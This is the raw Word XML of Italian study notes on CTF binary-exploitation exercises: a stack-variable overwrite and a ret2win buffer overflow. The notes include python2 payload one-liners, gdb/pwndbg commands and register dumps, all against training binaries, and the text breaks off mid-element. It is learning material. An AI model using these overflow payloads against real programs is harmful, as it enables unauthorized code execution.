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E66B1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OVFLW SOLUTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604668F8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0835D5AD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/Crypto-Cat/CTF/tree/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145310B0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B3E450" w14:textId="4E8C6766" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>NB ----&gt; in tutto il file si intende che gdb ven</w:t>
      </w:r>
      <w:r w:rsidR="00C21978">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>ga runnato in pwndbg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AA9A0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="345A53CA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02-overwriting_stack_variables_part2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D3F2F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167D968A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00A615C5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00A615C5">
        <w:t>$ file overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B04E2E7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00A615C5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00A615C5">
        <w:t>$ checksec overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581AFA8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ ghidra -&gt; per disassemblarlo (o qualsiasi altro r2/gef/..)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C7DB2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>------ scopriamo che il buffer_input è di 32 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF024F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ phython2 -c 'print 32 * "A" + "deadbeef"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F87913" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ./ovewrite &gt;&gt; yes? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdeadbeef </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549A8B8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>------ dal fatto che l'output restituito:</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA5404" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t>$ unhex "output" -&gt; in questo caso restituiva "daed" (al contrario quindi) si evince che:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5E7A1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ phython2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' &gt; payload    ---&gt; -c per eseguire direttamente dalla stringa, \x indica che i sinboli seguenti rappresentano un byte in esadecimale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202404F3" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ cat payload --&gt; per verficare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DEA29D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ./overwrite &lt; payload -------&gt;&gt;&gt; SOLVED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18112DB1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66128BCE" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>cheattare usando i registri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A59FD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ gdb overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AB3E4B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ info function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72816EA0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ break punto_in_cui_avviene_compare_trovato_con_ghidra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7DF6D8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73AD15" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; yes? "test" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3FF0E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ x $ebp - 0xc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CA2D0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; 0x12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EE087" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ set *indirizzo = 0xdeadbeef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22186227" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A341B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; god job!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DC3A8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B7C152" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Scrivendo un file python chiamato  exploit, con una semplice esecuzione possiamo tenere traccia di tutte le informazioni scoperte nell'analisi del file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118056F6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="7E546BB3" w14:textId="4CE1ED71" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>03-return_to_win:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29212F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="07B4A32C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Dopo le classiche funzioni di analisi. ---&gt; come in quella di prima da LSB executable capiamo che è eseguibile dal Less Significant Bit quindi parte da dx a sx ovvero al contrario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E48D40" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="560BA7EA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ gdb ret2win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835A9C8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ cyclic 100 -&gt; crea una sequenza ciclica di 100 caratteri aaaabaaacaaad…yaaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF151A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ run (senza debug) per testare fino a dove arriva prima di andare in segmentation fault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699702C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; Name: output_di_cyclic_100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477106C6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DBC03" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>──────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC29003" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EAX  0x6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BA386" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EBX  0x61616166 ('faaa')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D1CC1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ECX  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24E01F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDX  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6CE18" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EDI  0xf7ffcb80 (_rtld_global_ro) ◂— 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D3779" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESI  0xffffd074 —▸ 0xffffd245 ◂— '/home/gianny/Desktop/buffer_overflow/CTF/pwn/binary_exploitation_101/03-return_to_win/ret2win'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516051B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EBP  0x61616167 ('gaaa')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEC93A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ESP  0xffffcfb0 ◂— 'iaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AAFE8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> EIP  0x61616168 ('haaa')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B183F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>────────────────────[ DISASM / i386 / set emulate on ]───────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADEEDF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB1AD83" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>NB___________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775A65E2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="62039380" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Potremmo potenzialmente sovrascrivere gli indirizzi  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E6DD7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>in modo che EIP punti ad ESP dentro il quale abbiamo |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08B0DC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>iniettato codice malevolo (bad shell code).</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t xml:space="preserve">     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475ED5E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>_____________________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B201C51" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="49EB424A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ cyclic -l haaa -&gt; serve per dirci dopo quante lettere si arriva ad "haaa" che è l'ultimo punto che finisce nell'EIP (puntatore con il return address di cui vogliamo sovrascrivere il contenuto), tutto il resto andrà a finire in ESP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615AFC41" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ disassemble hacked -&gt; perché come ho notato dallo pseudo-code di ghidra è li che mi interessa arrivare, quindi disassemblo per prendere il primo indirizzo e settare l'indirizzo di ritorno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2E9D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ python2 -c 'print 28*"A"+"\x82\x91\x04\x08"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5378A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ gdb ret2win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90A8BC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ run &lt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA61B06" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61679024" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hi there, AAAAAAAAAAAAAAAAAAAAAAAAAAAA  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D11A28C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This function is TOP SECRET! How did you get in here?! :O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895BD2A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7386A1BD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF7B351" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA6F461" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00AF5671" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5671">
        <w:rPr>
          <w:rStyle w:val="Titolo1Carattere"/>
